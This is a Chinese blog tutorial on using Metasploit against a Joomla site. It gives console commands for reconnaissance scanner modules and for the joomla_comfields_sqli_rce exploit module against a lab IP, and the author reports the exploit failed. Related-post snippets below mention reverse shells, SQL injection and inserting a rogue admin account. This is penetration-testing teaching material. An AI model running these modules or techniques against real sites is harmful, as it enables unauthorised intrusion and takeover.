Metasploit6.0系列教程 -- 渗透Joomla网站

最新推荐文章于 2024-09-11 11:11:46 发布
最新推荐文章于 2024-09-11 11:11:46 发布
阅读量2.4k 收藏 1
点赞数 3
分类专栏: web安全工具库 文章标签: python Joomla 渗透测试 网络安全 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/120843808
版权

一、使用Metasploit对Joomal进行侦察

1、探测版本信息

选择joomla_version辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_versionset rhosts 192.168.1.111set rport 8080run

图片

2、页面枚举

选择Joomla_pages辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_pagesset rhosts 192.168.1.111set rport 8080run

图片

3、插件枚举

选择Joomla_plugins辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_pluginsset rhosts 192.168.1.111set rport 8080run

图片

二、使用Metasploit对Joomla进行漏洞利用

1、use unix/webapp/joomla_comfields_sqli_rce2、set rhosts 192.168.1.1113、set rport 80804、run

图片

5、因为利用模块会报错,所以需要修改一下,但是最后还是没有利用成功,获取cookie的时候可能出问题了,大家有兴趣的可以继续修改一下。

图片

该系列教程内容参考自华章IT出版的

《Web渗透测试实战:基于Metasploit 5.0》

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

图片

图片

图片

web安全工具库
关注
专栏目录
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 3094
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
Metasploit6.0系列教程 -- MSF术语
weixin_41489908的博客
10-05 458
一、漏洞利用(exploit): Metasploit启动时,会显示框架中已经公开可用的漏洞利用模块的数量。漏洞利用是一段利用漏洞为我们提供所需输出的代码。 二、载荷( payload):载荷是一段代码,通过漏洞利用把这段代码传递到目标系统或应用程序以执行我们想要的操作。载荷实际上可以分为三种主要类型: Single, Stager和Stage 1、Single:这类载荷是独立的,通常用于执行简单的任务,例如执行notepad.exe文件和添加用户。 2、Stager:这类载荷用来在两个系统之间建
2024版最新Metasploit安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
09-11 932
前言这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段渗透测试工具第6篇。
Web渗透测试实战——(2.1)Metasploit 6.0初步
重在分享
02-10 3423
Web渗透测试实战——(2.1)Metasploit 5.0初步一、什么是Metasploit二、技术要求三、Metasploit各生命周期中使用的组件与模块四、Metasploit 辅助工具1. Nessus2. 安装WindowsLinux(详细)3. kali自带 Namp4. kali 自带Metasploitkali安装 (虚拟机)实例教程(仅供教学测试)五、推荐的测试平台 一、什么是Metasploit Metasploit本质上是一个健壮且通用的渗透测试框架。它可以执行渗透测试生命周期中涉及的
CVE-2015-7857 Joomla注入漏洞利用工具(Python
weixin_30603633的博客
10-30 583
前段时间闹得很火的一个SQL注入漏洞,影响版本Joomla 3.2.0-3.4.4版本。目前官方已经提供了升级版本。 漏洞分析英文版本在这里:https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-A...
目前最新《Metasploit系列WEB安全渗透教程(第二季)(Tools羽翼)》
wen111111111的博客
04-08 366
Metasploit第二季第01课 远程代码执行.mp4 Metasploit第二季第02课 文件解析远程代码执行.mp4 Metasploit第二季第03课 口令安全.mp4 Metasploit第二季第04课 hash值传递渗透.mp4 Metasploit第二季第05课 Ndproxy内核提权.mp4 Metasploit第二季第06课 多种后面生成....
metasploitframework-win-x64
10-05
使用Metasploit安全测试工具在渗透测试中可以做很多事情,你可以保存你的日志、甚至定义每个有效负载在运行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免费的,它的开发团队由两个全职成员和少数...
metasploit-4.17.1-2020080301-windows-x64-installer.exe
01-10
metasploit
metasploit-framework-6.0.27
01-29
漏洞利用框架,Windows版本
Metasploit渗透测试指南(全) .pdf
12-23
总的来说,《Metasploit渗透测试指南》是一本全面且深入的教程,它将帮助读者熟练掌握Metasploit,进行有效的渗透测试,发现并修复潜在的安全风险,从而提升网络安全防护能力。对于网络安全专业人员、学生和爱好者来...
metasploit-framework-master.zip
09-08
"metasploit-framework-master.zip" 是这个框架的源代码压缩包,包含了完整的开发环境和工具集合。 **Metasploit框架的核心组件** 1. **Payloads(有效载荷)**:有效载荷是攻击的核心部分,它们在目标系统上执行...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
CVE-2015-7857 Joomla注入漏洞利用工具,有需要自行下载
Java反序列化漏洞利用工具(joomla
01-01
Java反序列化漏洞利用工具(joomla版本)亲测可用,直接GETSHELL以及执行命令没问题
joomla渗透测试(脏牛提权)
a3320315的博客
05-15 1094
本来是个域渗透,不过环境有问题,就当作web题在做了 解题过程 这是一个joomla cms 我们先扫一下目录 连接mysql 得到MySQL的账号和密码 然后创建新的管理员 INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064
Joomla!网站扫描工具joomscan
weixin_34362875的博客
07-27 625
2019独角兽企业重金招聘Python工程师标准>>> ...
joomla 反序列化漏洞利用
shatianyzg的博客
10-16 465
实战:反序列化漏洞(CVE-2015-8562)
joomscan工具使用(针对joomla扫描)
墨痕诉清风的博客
08-17 1397
漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。还能够以HTML或文本格式导出扫描报告。...
【CyberSecurityLearning 72】DC系列之DC-3渗透测试Joomla
_Co1a
04-24 1009
目录 DC-3靶机渗透测试 一、实验环境 二、渗透过程演示 1、信息搜集 2、SQL注入 3、登录后台 4、反弹shell 5、提权 总结: DC-3靶机渗透测试 DC-3也是一个黑盒测试,我们所能知道的只有它的MAC地址,我们可以根据它的MAC地址来确定IP地址 一、实验环境 实验环境: kali2021:192.168.3.155/24(桥接到vmnet0) 靶机环境DC-3(桥接到vmnet0,MAC地址:00:0C:29:2C:47:A4) ...
VULNHUB靶机渗透——DC-3(JoomlaCMS漏洞和Ubuntu16.04本地提权漏洞)
aarong的博客
12-31 2368
网络拓扑:攻击机kali和靶机dc-3同在NAT模式下 信息收集: arp-scan和nmap扫描: arp-scan -l nmap -T4 -A -v -p 1-65535 192.168.65.137 靶机开了80端口,待会浏览器访问 扫描出了Joomla好像是一个网络模板,百度搜一下看看: 猜对了,这就是一个网络模板 浏览器访问: 作者提示这次只有一个flag,要提权到root才能看到,并且没有任何提示。 dirsearch扫描网站路径:dirsearch -u http://192.1
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值